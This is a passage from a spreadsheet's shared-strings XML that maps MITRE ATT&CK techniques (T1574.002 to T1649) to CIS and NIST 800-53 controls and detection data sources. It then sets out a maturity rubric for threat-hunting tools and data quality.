    <t>T1574.002</t>
  </si>
  <si>
    <t>DLL Side-Loading</t>
  </si>
  <si>
    <t>4.1,6.1,6.2,6.8,7.1,7.2,7.3,7.4,7.5,16.13,18.3,18.5</t>
  </si>
  <si>
    <t>SA-10,SA-11,SA-15,SA-16,SA-17,SA-3,SA-4,SA-8,SI-2</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1574.004</t>
  </si>
  <si>
    <t>Dylib Hijacking</t>
  </si>
  <si>
    <t>4.1,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-2,CM-6,CM-8,RA-5,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1574.005</t>
  </si>
  <si>
    <t>Executable Installer File Permissions Weakness</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,6.1,6.2,6.8,16.13,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-8,CM-2,CM-5,CM-6,IA-2,RA-5,SI-4</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1574.006</t>
  </si>
  <si>
    <t>LD_PRELOAD</t>
  </si>
  <si>
    <t>CM-6,CM-7,SI-10,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1574.007</t>
  </si>
  <si>
    <t>Path Interception by PATH Environment Variable</t>
  </si>
  <si>
    <t>2.5,2.6,4.1,6.1,6.2,6.8,16.13,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CA-8,CM-2,CM-6,CM-7,CM-8,RA-5,SI-10,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>File: File Creation, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1574.008</t>
  </si>
  <si>
    <t>Path Interception by Search Order Hijacking</t>
  </si>
  <si>
    <t>T1574.009</t>
  </si>
  <si>
    <t>Path Interception by Unquoted Path</t>
  </si>
  <si>
    <t>T1574.010</t>
  </si>
  <si>
    <t>Services File Permissions Weakness</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1574.011</t>
  </si>
  <si>
    <t>Services Registry Permissions Weakness</t>
  </si>
  <si>
    <t>AC-6,CM-5</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Service: Service Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1574.012</t>
  </si>
  <si>
    <t>COR_PROFILER</t>
  </si>
  <si>
    <t>2.5,2.6,4.1,4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-5,CM-7,IA-2,SI-10,SI-7</t>
  </si>
  <si>
    <t>T1574.013</t>
  </si>
  <si>
    <t>KernelCallbackTable</t>
  </si>
  <si>
    <t>T1578</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure</t>
  </si>
  <si>
    <t>4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-5,IA-2,IA-4,IA-6,RA-5,SI-4</t>
  </si>
  <si>
    <t>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</si>
  <si>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T1578.001</t>
  </si>
  <si>
    <t>Create Snapshot</t>
  </si>
  <si>
    <t>Snapshot: Snapshot Creation, Snapshot: Snapshot Metadata</t>
  </si>
  <si>
    <t>T1578.002</t>
  </si>
  <si>
    <t>Create Cloud Instance</t>
  </si>
  <si>
    <t>T1578.003</t>
  </si>
  <si>
    <t>Delete Cloud Instance</t>
  </si>
  <si>
    <t>Instance: Instance Deletion, Instance: Instance Metadata</t>
  </si>
  <si>
    <t>T1578.004</t>
  </si>
  <si>
    <t>Revert Cloud Instance</t>
  </si>
  <si>
    <t>Instance: Instance Metadata, Instance: Instance Modification, Instance: Instance Start, Instance: Instance Stop</t>
  </si>
  <si>
    <t>T1580</t>
  </si>
  <si>
    <t>Cloud Infrastructure Discovery</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,IA-2</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Enumeration, Instance: Instance Enumeration, Snapshot: Snapshot Enumeration, Volume: Volume Enumeration</t>
  </si>
  <si>
    <t>T1583</t>
  </si>
  <si>
    <t>Acquire Infrastructure</t>
  </si>
  <si>
    <t>Domain Name: Active DNS, Domain Name: Domain Registration, Domain Name: Passive DNS, Internet Scan: Response Content, Internet Scan: Response Metadata</t>
  </si>
  <si>
    <t>T1583.001</t>
  </si>
  <si>
    <t>Domains</t>
  </si>
  <si>
    <t>Domain Name: Active DNS, Domain Name: Domain Registration, Domain Name: Passive DNS</t>
  </si>
  <si>
    <t>T1583.002</t>
  </si>
  <si>
    <t>DNS Server</t>
  </si>
  <si>
    <t>T1583.003</t>
  </si>
  <si>
    <t>Virtual Private Server</t>
  </si>
  <si>
    <t>Internet Scan: Response Content, Internet Scan: Response Metadata</t>
  </si>
  <si>
    <t>T1583.004</t>
  </si>
  <si>
    <t>Server</t>
  </si>
  <si>
    <t>T1583.005</t>
  </si>
  <si>
    <t>Botnet</t>
  </si>
  <si>
    <t>T1583.006</t>
  </si>
  <si>
    <t>Web Services</t>
  </si>
  <si>
    <t>Internet Scan: Response Content</t>
  </si>
  <si>
    <t>T1583.007</t>
  </si>
  <si>
    <t>Serverless</t>
  </si>
  <si>
    <t>T1584</t>
  </si>
  <si>
    <t>Compromise Infrastructure</t>
  </si>
  <si>
    <t>T1584.001</t>
  </si>
  <si>
    <t>T1584.002</t>
  </si>
  <si>
    <t>Domain Name: Active DNS, Domain Name: Passive DNS</t>
  </si>
  <si>
    <t>T1584.003</t>
  </si>
  <si>
    <t>T1584.004</t>
  </si>
  <si>
    <t>T1584.005</t>
  </si>
  <si>
    <t>T1584.006</t>
  </si>
  <si>
    <t>T1584.007</t>
  </si>
  <si>
    <t>T1585</t>
  </si>
  <si>
    <t>Establish Accounts</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Persona: Social Media</t>
  </si>
  <si>
    <t>T1585.001</t>
  </si>
  <si>
    <t>Social Media Accounts</t>
  </si>
  <si>
    <t>T1585.002</t>
  </si>
  <si>
    <t>Email Accounts</t>
  </si>
  <si>
    <t>T1585.003</t>
  </si>
  <si>
    <t>T1586</t>
  </si>
  <si>
    <t>Compromise Accounts</t>
  </si>
  <si>
    <t>T1586.001</t>
  </si>
  <si>
    <t>T1586.002</t>
  </si>
  <si>
    <t>T1586.003</t>
  </si>
  <si>
    <t>T1587</t>
  </si>
  <si>
    <t>Develop Capabilities</t>
  </si>
  <si>
    <t>Internet Scan: Response Content, Malware Repository: Malware Content, Malware Repository: Malware Metadata</t>
  </si>
  <si>
    <t>T1587.001</t>
  </si>
  <si>
    <t>Malware</t>
  </si>
  <si>
    <t>Malware Repository: Malware Content, Malware Repository: Malware Metadata</t>
  </si>
  <si>
    <t>T1587.002</t>
  </si>
  <si>
    <t>Code Signing Certificates</t>
  </si>
  <si>
    <t>Malware Repository: Malware Metadata</t>
  </si>
  <si>
    <t>T1587.003</t>
  </si>
  <si>
    <t>Digital Certificates</t>
  </si>
  <si>
    <t>T1587.004</t>
  </si>
  <si>
    <t>Exploits</t>
  </si>
  <si>
    <t>T1588</t>
  </si>
  <si>
    <t>Obtain Capabilities</t>
  </si>
  <si>
    <t>Certificate: Certificate Registration, Internet Scan: Response Content, Malware Repository: Malware Content, Malware Repository: Malware Metadata</t>
  </si>
  <si>
    <t>T1588.001</t>
  </si>
  <si>
    <t>T1588.002</t>
  </si>
  <si>
    <t>Tool</t>
  </si>
  <si>
    <t>T1588.003</t>
  </si>
  <si>
    <t>T1588.004</t>
  </si>
  <si>
    <t>Certificate: Certificate Registration, Internet Scan: Response Content</t>
  </si>
  <si>
    <t>T1588.005</t>
  </si>
  <si>
    <t>T1588.006</t>
  </si>
  <si>
    <t>Vulnerabilities</t>
  </si>
  <si>
    <t>T1589</t>
  </si>
  <si>
    <t>Gather Victim Identity Information</t>
  </si>
  <si>
    <t>T1589.001</t>
  </si>
  <si>
    <t>Credentials</t>
  </si>
  <si>
    <t>T1589.002</t>
  </si>
  <si>
    <t>Email Addresses</t>
  </si>
  <si>
    <t>T1589.003</t>
  </si>
  <si>
    <t>Employee Names</t>
  </si>
  <si>
    <t>T1590</t>
  </si>
  <si>
    <t>Gather Victim Network Information</t>
  </si>
  <si>
    <t>18.2,18.3</t>
  </si>
  <si>
    <t>T1590.001</t>
  </si>
  <si>
    <t>Domain Properties</t>
  </si>
  <si>
    <t>T1590.002</t>
  </si>
  <si>
    <t>T1590.003</t>
  </si>
  <si>
    <t>Network Trust Dependencies</t>
  </si>
  <si>
    <t>T1590.004</t>
  </si>
  <si>
    <t>Network Topology</t>
  </si>
  <si>
    <t>T1590.005</t>
  </si>
  <si>
    <t>IP Addresses</t>
  </si>
  <si>
    <t>T1590.006</t>
  </si>
  <si>
    <t>Network Security Appliances</t>
  </si>
  <si>
    <t>T1591</t>
  </si>
  <si>
    <t>Gather Victim Org Information</t>
  </si>
  <si>
    <t>T1591.001</t>
  </si>
  <si>
    <t>Determine Physical Locations</t>
  </si>
  <si>
    <t>T1591.002</t>
  </si>
  <si>
    <t>Business Relationships</t>
  </si>
  <si>
    <t>T1591.003</t>
  </si>
  <si>
    <t>Identify Business Tempo</t>
  </si>
  <si>
    <t>T1591.004</t>
  </si>
  <si>
    <t>Identify Roles</t>
  </si>
  <si>
    <t>T1592</t>
  </si>
  <si>
    <t>Gather Victim Host Information</t>
  </si>
  <si>
    <t>T1592.001</t>
  </si>
  <si>
    <t>Hardware</t>
  </si>
  <si>
    <t>T1592.002</t>
  </si>
  <si>
    <t>Software</t>
  </si>
  <si>
    <t>T1592.003</t>
  </si>
  <si>
    <t>Firmware</t>
  </si>
  <si>
    <t>T1592.004</t>
  </si>
  <si>
    <t>Client Configurations</t>
  </si>
  <si>
    <t>T1593</t>
  </si>
  <si>
    <t>Search Open Websites/Domains</t>
  </si>
  <si>
    <t>T1593.001</t>
  </si>
  <si>
    <t>Social Media</t>
  </si>
  <si>
    <t>T1593.002</t>
  </si>
  <si>
    <t>Search Engines</t>
  </si>
  <si>
    <t>T1593.003</t>
  </si>
  <si>
    <t>T1594</t>
  </si>
  <si>
    <t>Search Victim-Owned Websites</t>
  </si>
  <si>
    <t>T1595</t>
  </si>
  <si>
    <t>Active Scanning</t>
  </si>
  <si>
    <t>T1595.001</t>
  </si>
  <si>
    <t>Scanning IP Blocks</t>
  </si>
  <si>
    <t>T1595.002</t>
  </si>
  <si>
    <t>Vulnerability Scanning</t>
  </si>
  <si>
    <t>T1596</t>
  </si>
  <si>
    <t>Search Open Technical Databases</t>
  </si>
  <si>
    <t>T1596.001</t>
  </si>
  <si>
    <t>DNS/Passive DNS</t>
  </si>
  <si>
    <t>T1596.002</t>
  </si>
  <si>
    <t>WHOIS</t>
  </si>
  <si>
    <t>T1596.003</t>
  </si>
  <si>
    <t>T1596.004</t>
  </si>
  <si>
    <t>CDNs</t>
  </si>
  <si>
    <t>T1596.005</t>
  </si>
  <si>
    <t>Scan Databases</t>
  </si>
  <si>
    <t>T1597</t>
  </si>
  <si>
    <t>Search Closed Sources</t>
  </si>
  <si>
    <t>T1597.001</t>
  </si>
  <si>
    <t>Threat Intel Vendors</t>
  </si>
  <si>
    <t>T1597.002</t>
  </si>
  <si>
    <t>Purchase Technical Data</t>
  </si>
  <si>
    <t>T1598</t>
  </si>
  <si>
    <t>Phishing for Information</t>
  </si>
  <si>
    <t>T1598.001</t>
  </si>
  <si>
    <t>Spearphishing Service</t>
  </si>
  <si>
    <t>AC-4,CA-7,SC-44,SC-7,SI-3,SI-4,SI-8</t>
  </si>
  <si>
    <t>T1598.002</t>
  </si>
  <si>
    <t>T1598.003</t>
  </si>
  <si>
    <t>T1599</t>
  </si>
  <si>
    <t>Network Boundary Bridging</t>
  </si>
  <si>
    <t>4.1,4.2,4.4,4.7,5.2,5.3,5.4,6.1,6.2,6.4,6.5,6.8,12.2,13.4</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,IA-2,IA-5,SC-28,SC-7,SI-10,SI-15,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1599.001</t>
  </si>
  <si>
    <t>Network Address Translation Traversal</t>
  </si>
  <si>
    <t>T1600</t>
  </si>
  <si>
    <t>Weaken Encryption</t>
  </si>
  <si>
    <t>T1600.001</t>
  </si>
  <si>
    <t>Reduce Key Space</t>
  </si>
  <si>
    <t>T1600.002</t>
  </si>
  <si>
    <t>Disable Crypto Hardware</t>
  </si>
  <si>
    <t>T1601</t>
  </si>
  <si>
    <t>Modify System Image</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-8,CM-2,CM-3,CM-5,CM-6,CM-7,CM-8,IA-2,IA-5,IA-7,RA-9,SA-10,SA-11,SC-34,SI-2,SI-4,SI-7,SR-11,SR-4,SR-5,SR-6</t>
  </si>
  <si>
    <t>T1601.001</t>
  </si>
  <si>
    <t>Patch System Image</t>
  </si>
  <si>
    <t>3.6,4.1,4.7,5.2,5.3,5.4,6.1,6.2,6.4,6.5,6.8,12.2</t>
  </si>
  <si>
    <t>T1601.002</t>
  </si>
  <si>
    <t>Downgrade System Image</t>
  </si>
  <si>
    <t>T1602</t>
  </si>
  <si>
    <t>Data from Configuration Repository</t>
  </si>
  <si>
    <t>3.12,4.1,4.2,4.4,4.6,7.6,12.1,12.2,12.8,13.3,13.4,13.8,18.2,18.3,18.5,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-20,AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,CM-8,IA-3,IA-4,SC-28,SC-3,SC-4,SC-7,SC-8,SI-10,SI-12,SI-15,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1602.001</t>
  </si>
  <si>
    <t>SNMP (MIB Dump)</t>
  </si>
  <si>
    <t>3.12,4.1,4.2,4.4,4.6,7.6,7.7,12.1,12.2,12.8,13.3,13.4,13.8,18.2,18.3,18.5,3.10</t>
  </si>
  <si>
    <t>T1602.002</t>
  </si>
  <si>
    <t>Network Device Configuration Dump</t>
  </si>
  <si>
    <t>T1606</t>
  </si>
  <si>
    <t>Forge Web Credentials</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,MA-5,SC-17,SI-2</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Web Credential: Web Credential Creation, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>T1606.001</t>
  </si>
  <si>
    <t>Web Cookies</t>
  </si>
  <si>
    <t>4.1,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-6,SI-2</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>T1606.002</t>
  </si>
  <si>
    <t>SAML Tokens</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-6</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication, Web Credential: Web Credential Creation, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>T1608</t>
  </si>
  <si>
    <t>Stage Capabilities</t>
  </si>
  <si>
    <t>T1608.001</t>
  </si>
  <si>
    <t>Upload Malware</t>
  </si>
  <si>
    <t>T1608.002</t>
  </si>
  <si>
    <t>Upload Tool</t>
  </si>
  <si>
    <t>T1608.003</t>
  </si>
  <si>
    <t>Install Digital Certificate</t>
  </si>
  <si>
    <t>T1608.004</t>
  </si>
  <si>
    <t>Drive-by Target</t>
  </si>
  <si>
    <t>T1608.005</t>
  </si>
  <si>
    <t>Link Target</t>
  </si>
  <si>
    <t>T1608.006</t>
  </si>
  <si>
    <t>SEO Poisoning</t>
  </si>
  <si>
    <t>T1609</t>
  </si>
  <si>
    <t>Container Administration Command</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CM-6,CM-7,SC-7,SI-10,SI-7</t>
  </si>
  <si>
    <t>T1610</t>
  </si>
  <si>
    <t>Deploy Container</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CM-6,CM-7,IA-2,SC-7,SI-4</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Container: Container Creation, Container: Container Start, Pod: Pod Creation, Pod: Pod Modification</t>
  </si>
  <si>
    <t>T1611</t>
  </si>
  <si>
    <t>Escape to Host</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CM-5,CM-6,CM-7,IA-2,SC-18,SC-2,SC-3,SC-34,SC-39,SC-7,SI-16,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Container: Container Creation, Kernel: Kernel Module Load, Process: OS API Execution, Process: Process Creation, Volume: Volume Modification</t>
  </si>
  <si>
    <t xml:space="preserve">T1612 </t>
  </si>
  <si>
    <t>Build Image on Host</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CA-8,CM-6,CM-7,RA-5,SA-11,SC-7,SI-4</t>
  </si>
  <si>
    <t>Image: Image Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1613</t>
  </si>
  <si>
    <t>Container and Resource Disocovery</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CM-6,CM-7,IA-2,SC-43,SC-7,SI-4</t>
  </si>
  <si>
    <t>Container: Container Enumeration, Pod: Pod Enumeration</t>
  </si>
  <si>
    <t>T1614</t>
  </si>
  <si>
    <t>System Location Discovery</t>
  </si>
  <si>
    <t>T1614.001</t>
  </si>
  <si>
    <t>System Language Discovery</t>
  </si>
  <si>
    <t>T1615</t>
  </si>
  <si>
    <t>Group Policy Discovery</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Access, Command: Command Execution, Network Traffic: Network Traffic Content, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1619</t>
  </si>
  <si>
    <t>Cloud Storage Object Discovery</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CM-5,IA-2</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Access, Cloud Storage: Cloud Storage Enumeration</t>
  </si>
  <si>
    <t>T1620</t>
  </si>
  <si>
    <t>Reflective Code Loading</t>
  </si>
  <si>
    <t>Module: Module Load, Process: OS API Execution, Script: Script Execution</t>
  </si>
  <si>
    <t>T1621</t>
  </si>
  <si>
    <t>Multi-Factor Authentication Request Generation</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1622</t>
  </si>
  <si>
    <t>Debugger Evasion</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1647</t>
  </si>
  <si>
    <t>Plist File Modification</t>
  </si>
  <si>
    <t>T1648</t>
  </si>
  <si>
    <t>Serverless Execution</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Cloud Service: Cloud Service Modification</t>
  </si>
  <si>
    <t>T1649</t>
  </si>
  <si>
    <t>Steal or Forge Authentication Certificates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</si>
  <si>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</si>
  <si>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Technology</t>
  </si>
  <si>
    <t>Data Quality</t>
  </si>
  <si>
    <t>Definition</t>
  </si>
  <si>
    <t>Score #</t>
  </si>
  <si>
    <t xml:space="preserve">Hunt Tool </t>
  </si>
  <si>
    <t>Completeness</t>
  </si>
  <si>
    <t>Timeliness</t>
  </si>
  <si>
    <t>Consistency</t>
  </si>
  <si>
    <t>Easy of Use [Missing Data and Data Retention]</t>
  </si>
  <si>
    <t>Response Time [Active vs Passive (are you catching the adversary real time or is it after the fact)]</t>
  </si>
  <si>
    <t>None</t>
  </si>
  <si>
    <t>I don’t know what tools I have or need in order to start hunting. No documentation available. There is not even a SIEM to process the data.</t>
  </si>
  <si>
    <t>don’t know / not documented</t>
  </si>
  <si>
    <t xml:space="preserve">not documented/don't know </t>
  </si>
  <si>
    <t>Low</t>
  </si>
  <si>
    <t>The right technology is present to help centralize your data across several other tools (Splunk, ELK, EDR, etc).
Tools allowing you to run basic queries in order to make sense of the data without automation,reducing the efficiency and effectiveness of your hunt(i.e Running a few queries returns still thousands and thousands of events that your team will still need to go through manually).</t>
  </si>
  <si>
    <t>Endpoint Coverage - required data source is available from  0 - 25% of your network endpoints.
Missing Data - Required data (values or fields) is missing 75%-100%.
Data Retention - Required data is retained 0-25% of the time needed or defined by the organization.</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Timezones - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Original timezone identified in data (Local or UTC)</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Ingestion vs Creation - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Ingestion time only automatically generated</t>
    </r>
  </si>
  <si>
    <r>
      <t>Standard Field Names</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field names standardized only 0-25% across all data sources.</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Standard Field Types</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field types standardized only 0-25% across all data sources.</t>
    </r>
  </si>
  <si>
    <t>Missing Data - Required data (values or fields) is missing 75%-100%.
Data Retention - Required data is retained 0-25% of the time needed or defined by the organization.</t>
  </si>
  <si>
    <t>Passive 0-25 | Active 0-25%</t>
  </si>
  <si>
    <t>Medium</t>
  </si>
  <si>
    <t>Having the right tools/processes to aggregate and make sense of all the data. Possible to not have an effective team to automate rules/queries. Tools helping you correlate and integrate numerous data types across all your endpoints in order to filter out noise and potential false positives. Here is where you start using a few basic Data Science capabilities provided by your tools (i.e ELK Enterprise) in order to make sense of all the data that you have in your central repository (Potential Automation).</t>
  </si>
  <si>
    <t>Endpoint Coverage - required data source is available from  50% - 75% of your network endpoints.
Missing Data - Required data (values or fields) is missing 25%-50%.
Data Retention - Required data is retained 50%-75% of the time needed or defined by the organization.</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Timezones - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Extra timezones identified in order to cover at least local and UTC times (not fixed yed).</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Ingestion vs Creation</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Ingestion time only automatically generated.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Standard Field Names</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field names standardized only 25%-50% across all data sources.</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Standard Field Types</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field types standardized only 25%-50% across all data sources.</t>
    </r>
  </si>
  <si>
    <t>Missing Data - Required data (values or fields) is missing 25%-75%.
Data Retention - Required data is retained 25%-75% of the time needed or defined by the organization.</t>
  </si>
  <si>
    <t>Passive 50-75% | Active 50-75%</t>
  </si>
  <si>
    <t>High</t>
  </si>
  <si>
    <t>Having tools to leverage over simple outlier detection techniques. Can you validate the detection of an adversary technique by just applying basic data science techniques? Can you integrate the appropriate tools with other platforms (processes) with other teams across your security department (IR Ticketing system, Intel Platforms (not just to ingest IOCs, but to document hunting campaign results that might turn into actionable intelligence), etc). This is more specific to your organization and flexibility of your hunting tools play a big role here (i.e API access)</t>
  </si>
  <si>
    <t>Endpoint Coverage - required data source is available from  75%-100% of your network endpoints
Missing Data - Required data (values or fields) is missing 0%-25%
Data Retention - Required data is retained 75%-100% of the time needed or defined by the organization</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Timezones - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Extra timezones configured in order to cover at least local and UTC times
Ingestion vs Creation - Ingestion time automatically generated and Creation time capability identified</t>
    </r>
  </si>
  <si>
    <r>
      <t>Standard Field Names</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field names standardized only 50%-75% across all data sources</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Standard Field Types</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field types standardized only 50%-75% across all data sources</t>
    </r>
  </si>
  <si>
    <t>Missing Data - Required data (values or fields) is missing 0-25%
Data Retention - Required data is retained 75%-100% of the time needed or defined by the organization.</t>
  </si>
  <si>
    <t>Passive 75-100% | Active 75-100%</t>
  </si>
  <si>
    <r>
      <t>Timezones</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Extra timezones configured in order to cover at least local and UTC times
 </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Ingestion vs Creation</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Ingestion  and Creation time configured to be available as two different fields and used to reduce latency.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Standard Field Names</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field names standardized only 50%-75% across all data sources</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Standard Field Types</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field types standardized only 75%-100% across all data sources</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Timezones </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">- Extra timezones configured in order to cover at least local and UTC times
 </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Ingestion vs Creation - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ingestion and creation time difference has been reduced to the minimun.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Standard Field Names</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - Required data field names standardized only 75%-100% across all data sources</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Standard Field Types</t>
    </r>
    <r>
      <rPr>
